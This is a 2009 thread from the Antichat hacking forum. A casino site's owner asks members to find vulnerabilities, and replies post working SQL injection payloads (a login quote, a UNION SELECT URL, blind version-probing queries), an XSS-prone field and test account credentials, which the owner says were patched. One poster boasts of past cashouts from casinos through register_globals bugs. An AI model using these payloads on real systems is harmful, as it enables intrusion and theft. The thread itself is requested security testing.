Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
03.03.2009, 00:46
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 13
Провел на форуме:
70833
Репутация:
7
|
|
Тест wmcasino.org
Прошу протестировать сайт _http://wmcasino.org/ двиг FREE хоть его и продают барыги псевдо разрабы... НО несмотря на это все уязвимости заявленные на форумах и пр... были залатаны, добавлено много своего... Самописом назвать язык не повернётся, но и сказать что я типо токо диз сменил в этом скрипте это будет не верно...
Серьёзные дыры прошу публиковать под большим хайдом или как тут принято... + ко мне в осику на обсуждение... за инфу естественно плачу $
ICQ 357-350
|
|
|
03.03.2009, 22:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2007
Сообщений: 642
Провел на форуме:
3241649
Репутация:
1632
|
|
SQL-inj
http://wmcasino.org/lobby/login.php
login: '
password: любой
__________________
<<<< Смотри на дату моей реги и завидуй!!!
|
|
|
|
03.03.2009, 22:58
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Поле login немного бажное!
http://wmcasino.org/lobby/login_proc.php?log=%27+union+select+1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5+limit+1,1/*&psw=&submit=%C2%EE%E9%F2%E8&send=1
идет редирект на главн страницу
хз чо с ним делать ((
|
|
|
|
03.03.2009, 23:09
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Немного уточню, тк сидел раскручивал:
' and 1=if((select substring(version(),1,1)=4),1,(select 1 from information_schema.tables))/*
' and 1=if((select substring(version(),1,1)=5),1,(select 1 from information_schema.tables))/*
=> 5й мускул с доступом к information_schema.
XSS
http://wmcasino.org/lobby/generate.php
Поле frmName
Если нет привязки сессии к ип и не чекается реферер, тогда это можно отнести к уязвимости.
|
|
|
|
03.03.2009, 23:54
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 13
Провел на форуме:
70833
Репутация:
7
|
|
Сообщение от sboy20042
SQL-inj
http://wmcasino.org/lobby/login.php
login: '
password: любой
ЗалаталсО
|
|
|
|
04.03.2009, 00:08
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 13
Провел на форуме:
70833
Репутация:
7
|
|
Сообщение от oRb
Немного уточню, тк сидел раскручивал:
' and 1=if((select substring(version(),1,1)=4),1,(select 1 from information_schema.tables))/*
' and 1=if((select substring(version(),1,1)=5),1,(select 1 from information_schema.tables))/*
=> 5й мускул с доступом к information_schema.
XSS
http://wmcasino.org/lobby/generate.php
Поле frmName
Если нет привязки сессии к ип и не чекается реферер, тогда это можно отнести к уязвимости.
Так же залаталсО
|
|
|
|
06.03.2009, 12:21
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
т.к. ТС ппц просто, я ему в репу отписал он всёравно акк не дал, нате
wmcasino:wmcasino
<offtop>Дыры не искал но казино мну ненравица</offtop>
|
|
|
|
07.03.2009, 12:09
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 13
Провел на форуме:
70833
Репутация:
7
|
|
Сообщение от Ponchik
т.к. ТС ппц просто, я ему в репу отписал он всёравно акк не дал, нате
wmcasino:wmcasino
<offtop>Дыры не искал но казино мну ненравица</offtop>
Ничё не понял... Ты типо попрасил у мну акк в казино, а я отказал? Баян какой-то...
Логин antichat
Пароль antichat
WMR 100
FUN 1000
Тестируйте...
Сообщение от b3
Надеюсь у тебя register_globals=off, помню при включеном там было половину игр уязвимо, выводил из десятка казино по 200-300 рублей, сцуки так должны и остались.
Если ты Б3 с граббы, то тебе ли не знать про register_globals= и про дыры в играх которые я тебе показал... не так ли :-)
register_globals=ON
Игры от этого переписаны все.
Баги 2005 года так же залатаны...
Тестируйте кому не лень тратить свой время...
|
|
|
|
08.03.2009, 03:56
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 13
Провел на форуме:
70833
Репутация:
7
|
|
Ха ха оч. смешно...
636 antichat 4.00 WebMoney R146881636470 96 р Оплатить - в оплате отказано
Зачем вывод делать, когда это было для теста начислено...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
